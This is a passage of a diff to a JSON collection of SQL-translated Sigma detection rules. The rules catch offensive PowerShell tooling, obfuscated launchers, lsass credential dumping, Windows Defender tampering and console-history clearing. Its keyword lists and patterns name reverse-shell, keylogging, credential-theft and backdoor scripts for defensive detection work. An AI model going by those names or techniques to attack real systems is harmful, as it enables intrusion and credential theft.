'%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection 
Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" 
+ "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" 
], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious 
changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": 
"bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and 
\"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE 